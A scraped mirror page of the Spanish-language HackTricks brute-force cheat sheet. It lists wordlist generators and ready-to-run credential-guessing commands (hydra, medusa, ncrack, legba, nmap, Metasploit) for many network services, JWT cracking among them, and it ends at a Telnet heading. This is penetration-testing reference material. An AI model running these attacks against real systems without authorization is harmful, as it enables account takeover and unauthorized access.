2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-01 14:53:36 +00:00
hacktricks/generic-methodologies-and-resources/brute-force.md

981 lines
50 KiB
Markdown
Raw Normal View History

# Fuerza Bruta - Hoja de Trucos
2023-06-05 18:52:52 +00:00
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
2023-06-05 18:52:52 +00:00
\
Utiliza [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y **automatizar flujos de trabajo** fácilmente con las herramientas comunitarias más avanzadas del mundo.\
¡Accede hoy mismo:
2023-06-05 18:52:52 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Experto en Red Team de AWS de HackTricks)</strong></a><strong>!</strong></summary>
2023-06-05 18:52:52 +00:00
Otras formas de apoyar a HackTricks:
* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF**, consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén [**productos oficiales de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
2023-06-05 18:52:52 +00:00
</details>
## Credenciales Predeterminadas
2023-06-05 18:52:52 +00:00
**Busca en Google** las credenciales predeterminadas de la tecnología que se está utilizando, o **prueba estos enlaces**:
2023-06-05 18:52:52 +00:00
* [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet)
* [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html)
* [**http://www.vulnerabilityassessment.co.uk/passwordsC.htm**](http://www.vulnerabilityassessment.co.uk/passwordsC.htm)
* [**https://192-168-1-1ip.mobi/default-router-passwords-list/**](https://192-168-1-1ip.mobi/default-router-passwords-list/)
* [**https://datarecovery.com/rd/default-passwords/**](https://datarecovery.com/rd/default-passwords/)
* [**https://bizuns.com/default-passwords-list**](https://bizuns.com/default-passwords-list)
* [**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv**](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv)
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
* [**https://www.cirt.net/passwords**](https://www.cirt.net/passwords)
* [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com)
* [**https://many-passwords.github.io/**](https://many-passwords.github.io)
* [**https://theinfocentric.com/**](https://theinfocentric.com/)
2023-06-05 18:52:52 +00:00
## **Crea tus propios Diccionarios**
2023-06-05 18:52:52 +00:00
Encuentra toda la información posible sobre el objetivo y genera un diccionario personalizado. Herramientas que pueden ayudar:
2023-06-05 18:52:52 +00:00
### Crunch
```bash
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%
```
### Cewl
Cewl es una herramienta que se utiliza para generar listas de palabras clave a partir de un sitio web. Esto se logra escaneando el sitio en busca de palabras y luego ordenándolas por frecuencia. Estas listas de palabras clave pueden ser útiles para realizar ataques de fuerza bruta o para generar listas de posibles contraseñas.
2023-06-05 18:52:52 +00:00
```bash
cewl example.com -m 5 -w words.txt
```
### [CUPP](https://github.com/Mebus/cupp)
Genera contraseñas basadas en tu conocimiento sobre la víctima (nombres, fechas...)
```
python3 cupp.py -h
```
### [Wister](https://github.com/cycurity/wister)
Una herramienta generadora de listas de palabras, que te permite suministrar un conjunto de palabras, dándote la posibilidad de crear múltiples variaciones a partir de las palabras dadas, creando una lista de palabras única e ideal para usar en relación a un objetivo específico.
2023-06-05 18:52:52 +00:00
```bash
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
__ _______ _____ _______ ______ _____
\ \ / /_ _|/ ____|__ __| ____| __ \
\ \ /\ / / | | | (___ | | | |__ | |__) |
\ \/ \/ / | | \___ \ | | | __| | _ /
\ /\ / _| |_ ____) | | | | |____| | \ \
\/ \/ |_____|_____/ |_| |______|_| \_\
Version 1.0.3 Cycurity
2023-06-05 18:52:52 +00:00
Generating wordlist...
[########################################] 100%
Generated 67885 lines.
Finished in 0.920s.
```
### [pydictor](https://github.com/LandGrey/pydictor)
### Listas de palabras
* [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists)
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
* [**https://github.com/kaonashi-passwords/Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi)
* [**https://github.com/google/fuzzing/tree/master/dictionaries**](https://github.com/google/fuzzing/tree/master/dictionaries)
2023-06-05 18:52:52 +00:00
* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)
* [**https://weakpass.com/wordlist/**](https://weakpass.com/wordlist/)
* [**https://wordlists.assetnote.io/**](https://wordlists.assetnote.io/)
* [**https://github.com/fssecur3/fuzzlists**](https://github.com/fssecur3/fuzzlists)
* [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager)
* [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists)
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
2023-06-05 18:52:52 +00:00
\
Utilice [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y **automatizar flujos de trabajo** fácilmente con las herramientas comunitarias más avanzadas del mundo.\
Obtenga acceso hoy:
2023-06-05 18:52:52 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Servicios
Ordenados alfabéticamente por nombre de servicio.
2023-06-05 18:52:52 +00:00
### AFP
```bash
nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_PASSWDS>
msf> set USER_FILE <PATH_USERS>
msf> run
```
### AJP
2024-04-06 18:13:31 +00:00
AJP (Apache JServ Protocol) is a binary protocol that can be brute-forced to gain unauthorized access. It is commonly used to connect web servers with servlet containers.
2023-06-05 18:52:52 +00:00
```bash
nmap --script ajp-brute -p 8009 <IP>
```
## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)
```bash
legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]
```
### Cassandra
2024-04-06 18:13:31 +00:00
Cassandra es una base de datos distribuida altamente escalable que se puede utilizar para almacenar grandes cantidades de datos en múltiples servidores sin un único punto de fallo. Algunas técnicas de fuerza bruta que se pueden utilizar para atacar Cassandra incluyen:
- **Fuerza bruta en la autenticación**: Intentar adivinar credenciales válidas mediante la prueba de combinaciones de nombres de usuario y contraseñas.
- **Fuerza bruta en las consultas**: Realizar un gran número de consultas para intentar recuperar información sensible o realizar modificaciones en la base de datos.
Es importante implementar medidas de seguridad sólidas, como contraseñas fuertes y autenticación de dos factores, para proteger una base de datos Cassandra contra ataques de fuerza bruta.
2023-06-05 18:52:52 +00:00
```bash
nmap --script cassandra-brute -p 9160 <IP>
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042
2023-06-05 18:52:52 +00:00
```
### CouchDB
CouchDB es una base de datos NoSQL que se puede atacar mediante fuerza bruta para intentar adivinar credenciales débiles.
2023-06-05 18:52:52 +00:00
```bash
msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
```
### Registro de Docker
```
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
```
### Elasticsearch
Elasticsearch is a distributed, RESTful search and analytics engine capable of solving a growing number of use cases. It allows you to store, search, and analyze big volumes of data quickly and in near real time.
2023-06-05 18:52:52 +00:00
```
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
```
### FTP
---
Brute forcing FTP credentials is a common technique used during penetration testing. Tools like Hydra and Medusa can be used to automate the process of trying different username and password combinations until the correct one is found.
#### Hydra
Hydra is a popular password-cracking tool that can perform rapid dictionary attacks against more than fifty protocols, including FTP. It supports multiple attack types, including brute force attacks.
To brute force FTP credentials using Hydra, you can use the following command:
```bash
hydra -t 4 -l <username> -P <passwords.txt> ftp://<target_ip>
```
- `-t 4`: Specifies the number of parallel tasks to perform.
- `-l <username>`: Specifies the username to brute force.
- `-P <passwords.txt>`: Specifies the file containing a list of passwords to try.
- `ftp://<target_ip>`: Specifies the FTP server IP address.
#### Medusa
Medusa is another popular password-cracking tool that supports FTP among other protocols. It is known for its speed and reliability in brute forcing credentials.
To brute force FTP credentials using Medusa, you can use the following command:
```bash
medusa -u <username> -P <passwords.txt> -h <target_ip> -M ftp
```
- `-u <username>`: Specifies the username to brute force.
- `-P <passwords.txt>`: Specifies the file containing a list of passwords to try.
- `-h <target_ip>`: Specifies the FTP server IP address.
- `-M ftp`: Specifies the protocol to use (in this case, FTP).
2024-04-06 18:13:31 +00:00
Both Hydra and Medusa are powerful tools that can help penetration testers identify weak credentials and improve the overall security of FTP servers.
2023-06-05 18:52:52 +00:00
```bash
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
2023-06-05 18:52:52 +00:00
```
### Fuerza Bruta Genérica HTTP
2023-06-05 18:52:52 +00:00
#### [**WFuzz**](../pentesting-web/web-tool-wfuzz.md)
### Autenticación Básica HTTP
```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/
2023-06-05 18:52:52 +00:00
```
### HTTP - NTLM
```bash
legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
```
### HTTP - Enviar formulario
2023-06-05 18:52:52 +00:00
```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https
```
Para http**s** debes cambiar de "http-post-form" a "**https-post-form"**
2023-06-05 18:52:52 +00:00
### **HTTP - CMS --** (W)ordpress, (J)oomla o (D)rupal o (M)oodle
```bash
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
# Check also https://github.com/evilsocket/legba/wiki/HTTP
2023-06-05 18:52:52 +00:00
```
### IMAP
IMAP (Internet Message Access Protocol) is a standard email protocol that stores email messages on a mail server. It allows the end user to view and manipulate the messages as though they were stored locally on the end user's device.
2023-06-05 18:52:52 +00:00
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
legba imap --username user --password data/passwords.txt --target localhost:993
2023-06-05 18:52:52 +00:00
```
### IRC
Internet Relay Chat (IRC) es un protocolo de comunicación en tiempo real basado en texto que facilita la comunicación en grupos a través de canales de chat. Los hackers a menudo utilizan técnicas de fuerza bruta para descifrar contraseñas débiles en servidores IRC y obtener acceso no autorizado.
2023-06-05 18:52:52 +00:00
```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
```
### ISCSI
2023-06-05 18:52:52 +00:00
### ISCSI
```bash
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
```
### JWT
JSON Web Tokens (JWT) son un estándar abierto (RFC 7519) que define un método compacto y autónomo para transmitir información de forma segura entre las partes como un objeto JSON. Los JWT pueden ser firmados utilizando un algoritmo (por ejemplo, HMAC SHA256) con una clave secreta, o utilizando pares de clave pública/privada.
2023-06-05 18:52:52 +00:00
```bash
#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt <JWT token>
#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
```
### LDAP
2024-04-06 18:13:31 +00:00
LDAP (Protocolo Ligero de Acceso a Directorios) es un protocolo estándar de la industria utilizado para acceder y mantener servicios de directorio de forma remota. Los ataques de fuerza bruta contra servidores LDAP son comunes y pueden ser mitigados mediante la implementación de medidas de seguridad como bloqueos de cuenta después de varios intentos fallidos.
2023-06-05 18:52:52 +00:00
```bash
nmap --script ldap-brute -p 389 <IP>
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match
2023-06-05 18:52:52 +00:00
```
### MQTT
MQTT (Message Queuing Telemetry Transport) es un protocolo de mensajería ligero diseñado para dispositivos con ancho de banda limitado o conexiones inestables.
2023-06-05 18:52:52 +00:00
```
ncrack mqtt://127.0.0.1 --user test P /root/Desktop/pass.txt -v
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt
2023-06-05 18:52:52 +00:00
```
### Mongo
```bash
nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
legba mongodb --target localhost:27017 --username root --password data/passwords.txt
```
### MSSQL
### MSSQL
```bash
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
2023-06-05 18:52:52 +00:00
```
### MySQL
MySQL es un sistema de gestión de bases de datos relacional de código abierto ampliamente utilizado.
2023-06-05 18:52:52 +00:00
```bash
# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql
# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
#Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306
```
### OracleSQL
#### Fuerza bruta
La fuerza bruta es un método comúnmente utilizado para descifrar contraseñas mediante la generación de todas las combinaciones posibles de caracteres y probándolas una por una hasta encontrar la correcta. En el contexto de OracleSQL, la fuerza bruta puede ser utilizada para intentar acceder a cuentas protegidas por contraseñas débiles o predecibles. Es importante tener en cuenta que el uso de la fuerza bruta para acceder a sistemas sin autorización es ilegal y puede tener consecuencias legales graves.
2023-06-05 18:52:52 +00:00
```bash
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>
#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>
#for some reason nmap fails sometimes when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt
2023-06-05 18:52:52 +00:00
```
Para usar **oracle\_login** con **patator** necesitas **instalar**:
2023-06-05 18:52:52 +00:00
```bash
pip3 install cx_Oracle --upgrade
```
[Bruteforce de hash de OracleSQL sin conexión](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**versiones 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** y **11.2.0.3**):
2023-06-05 18:52:52 +00:00
```bash
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
2023-06-05 18:52:52 +00:00
```
### POP
#### Brute Force
##### Description
Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is effective but can be time-consuming, especially for complex passwords.
##### Tools
- Hydra
- Medusa
- Ncrack
2024-04-06 18:13:31 +00:00
##### Prevention
- Use complex and unique passwords
- Implement account lockout policies
- Use multi-factor authentication
2023-06-05 18:52:52 +00:00
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
# Insecure
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110
# SSL
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl
```
### PostgreSQL
PostgreSQL es un sistema de gestión de bases de datos relacional de código abierto y potente. Es ampliamente utilizado en aplicaciones web y móviles. Aquí hay un ejemplo de cómo realizar un ataque de fuerza bruta contra una base de datos PostgreSQL:
1. **Enumeración de usuarios**: Utilice herramientas como `pg_enum` para enumerar usuarios válidos en la base de datos.
2. **Ataque de fuerza bruta**: Utilice herramientas como `Hydra` o `Patator` para realizar un ataque de fuerza bruta contra los usuarios de la base de datos PostgreSQL.
3. **Diccionarios personalizados**: Cree diccionarios personalizados con posibles contraseñas basadas en información del objetivo.
4. **Bloqueo de cuentas**: Tenga en cuenta que algunos sistemas pueden bloquear cuentas después de varios intentos fallidos de inicio de sesión.
2024-04-06 18:13:31 +00:00
Recuerde siempre obtener la autorización adecuada antes de realizar pruebas de penetración en sistemas de bases de datos PostgreSQL.
2023-06-05 18:52:52 +00:00
```bash
hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M postgres
ncrack v U /root/Desktop/user.txt P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432
2023-06-05 18:52:52 +00:00
```
### PPTP
Puedes descargar el paquete `.deb` para instalar desde [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/)
2023-06-05 18:52:52 +00:00
```bash
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter u <Username> <IP>
```
### RDP
2023-06-05 18:52:52 +00:00
```bash
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]
2023-06-05 18:52:52 +00:00
```
### Redis
2024-04-06 18:13:31 +00:00
Redis es una base de datos en memoria de código abierto que se utiliza a menudo como caché o almacén de datos en tiempo real. Es común encontrar instancias de Redis expuestas públicamente sin autenticación, lo que las hace vulnerables a ataques de fuerza bruta. Los atacantes pueden intentar adivinar contraseñas débiles o comunes para obtener acceso no autorizado a la base de datos Redis. Es importante asegurarse de que las instancias de Redis estén protegidas con contraseñas seguras y que no estén accesibles desde Internet sin autenticación adecuada.
2023-06-05 18:52:52 +00:00
```bash
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]
2023-06-05 18:52:52 +00:00
```
### Rexec
2024-04-06 18:13:31 +00:00
Rexec is a simple remote execution service that can be brute-forced. It is a service that allows a user to execute commands on a remote system. Brute-forcing Rexec involves trying different username and password combinations until the correct one is found. This can be done using tools like Hydra or Medusa.
2023-06-05 18:52:52 +00:00
```bash
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
```
### Rlogin
Rlogin es un protocolo de red que permite a un usuario iniciar sesión en otro host a través de una red. Es vulnerable a ataques de fuerza bruta debido a su falta de medidas de seguridad, lo que permite a los atacantes intentar múltiples combinaciones de contraseñas para obtener acceso no autorizado. Es importante implementar contramedidas como políticas de contraseñas seguras y bloqueo de cuentas después de varios intentos fallidos para mitigar este tipo de ataques.
2023-06-05 18:52:52 +00:00
```bash
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
```
### Rsh
#### Brute Force
La técnica de fuerza bruta implica probar todas las combinaciones posibles de contraseñas hasta encontrar la correcta. Puede ser efectiva pero es muy lenta y puede ser detectada fácilmente por los sistemas de seguridad.
2023-06-05 18:52:52 +00:00
```bash
hydra -L <Username_list> rsh://<Victim_IP> -v -V
```
[http://pentestmonkey.net/tools/misc/rsh-grind](http://pentestmonkey.net/tools/misc/rsh-grind)
### Rsync
2023-06-05 18:52:52 +00:00
```bash
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
```
### RTSP
2024-04-06 18:13:31 +00:00
### RTSP
2023-06-05 18:52:52 +00:00
```bash
hydra -l root -P passwords.txt <IP> rtsp
```
### SFTP
2024-04-06 18:13:31 +00:00
SFTP (Secure File Transfer Protocol) is a secure way to transfer files between machines over a secure channel. It is often used as a secure alternative to FTP.
```bash
legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
```
2023-06-05 18:52:52 +00:00
### SNMP
### SNMP
2023-06-05 18:52:52 +00:00
```bash
msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
```
### SMB
2024-04-06 18:13:31 +00:00
SMB (Server Message Block) es un protocolo de red utilizado para compartir recursos, como archivos e impresoras, entre nodos en una red. Es comúnmente utilizado en entornos Windows y puede ser objetivo de ataques de fuerza bruta para intentar obtener acceso no autorizado a recursos compartidos.
2023-06-05 18:52:52 +00:00
```bash
nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]
2023-06-05 18:52:52 +00:00
```
### SMTP
2024-04-06 18:13:31 +00:00
El Protocolo Simple de Transferencia de Correo (SMTP) es un protocolo de red utilizado para enviar mensajes de correo electrónico entre dispositivos.
2023-06-05 18:52:52 +00:00
```bash
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]
2023-06-05 18:52:52 +00:00
```
### SOCKS
SOCKS (Socket Secure) es un protocolo de red que permite a un cliente en una red interna atravesar un firewall y conectarse a un servidor fuera de la red.
2023-06-05 18:52:52 +00:00
```bash
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080
```
### SQL Server
#### Brute Force
Brute force attacks against SQL Server involve attempting to guess usernames and passwords to gain unauthorized access. This can be done using automated tools that systematically try all possible combinations of usernames and passwords until the correct one is found. It is important to use strong and complex passwords to protect against brute force attacks.
#### Prevention
To prevent brute force attacks against SQL Server, consider implementing the following measures:
2024-04-06 18:13:31 +00:00
- **Strong Password Policy:** Enforce the use of strong and complex passwords that are difficult to guess.
- **Account Lockout Policy:** Implement an account lockout policy that locks out an account after a certain number of failed login attempts.
- **Multi-Factor Authentication:** Implement multi-factor authentication to add an extra layer of security.
- **Network Security:** Ensure that the SQL Server is not directly accessible from the internet and is protected by a firewall.
- **Regular Monitoring:** Monitor the SQL Server logs for any suspicious login attempts and take action if any are detected.
By implementing these measures, you can help protect your SQL Server from brute force attacks and enhance its overall security.
```bash
#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
2023-06-05 18:52:52 +00:00
```
### SSH
SSH (Secure Shell) is a cryptographic network protocol for operating network services securely over an unsecured network. It is widely used for remote login and command execution.
### Brute Force Attack
2024-04-06 18:13:31 +00:00
A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.
2023-06-05 18:52:52 +00:00
```bash
hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
2023-06-05 18:52:52 +00:00
```
#### Claves SSH débiles / PRNG predecible de Debian
Algunos sistemas tienen fallos conocidos en la semilla aleatoria utilizada para generar material criptográfico. Esto puede resultar en un espacio de claves dramáticamente reducido que puede ser forzado con herramientas como [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute). Conjuntos pregenerados de claves débiles también están disponibles, como [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
2023-06-05 18:52:52 +00:00
### STOMP (ActiveMQ, RabbitMQ, HornetQ y OpenMQ)
El protocolo de texto STOMP es un protocolo de mensajería ampliamente utilizado que **permite una comunicación e interacción fluida con servicios populares de encolado de mensajes** como RabbitMQ, ActiveMQ, HornetQ y OpenMQ. Proporciona un enfoque estandarizado y eficiente para intercambiar mensajes y realizar diversas operaciones de mensajería.
2023-06-05 18:52:52 +00:00
```bash
legba stomp --target localhost:61613 --username admin --password data/passwords.txt
2023-06-05 18:52:52 +00:00
```
### Telnet
